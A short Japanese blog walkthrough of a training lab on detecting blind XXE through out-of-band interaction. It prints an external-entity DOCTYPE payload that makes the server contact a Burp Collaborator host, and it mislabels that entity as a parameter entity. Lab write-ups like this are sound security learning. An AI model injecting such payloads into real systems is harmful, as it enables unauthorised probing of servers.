Hello there, ('ω')ノ

 

帯域外インタラクションを伴うブラインドXXEを。

XML入力を解析するが、結果を表示しない「在庫確認」機能がありらしく。

今回は、 外部ドメインとの帯域外相互作用をトリガーすることで。

ブラインドXXEの脆弱性を検出できるようで。

まずは、Check stockを。

 

 

XMLのリクエストをリピータへ。

 

 

下記の外部エンティティ定義を挿入して。

 

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> ]>

 

 

コラボレータを起動して、payloadをコピーして。

 

 

コピーしたpayloadをBurpCollaboratorサブドメインに挿入して。

 

 

productId番号を外部エンティティへの参照に置き換えてSendすると。

 

 

ペイロードの結果がHTTPレスポンスに表示されて。

 

 

 

クリアできた。

 

 

このXXEペイロードは。

xxeと呼ばれるXMLパラメータエンティティを宣言して。

そして、DTD内のエンティティを使用して。

これで、攻撃者のドメインへのDNSルックアップとHTTPリクエストが発生して。

攻撃が成功したことを確認して。

 

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> ]>

 

Best regards, (^^ゞ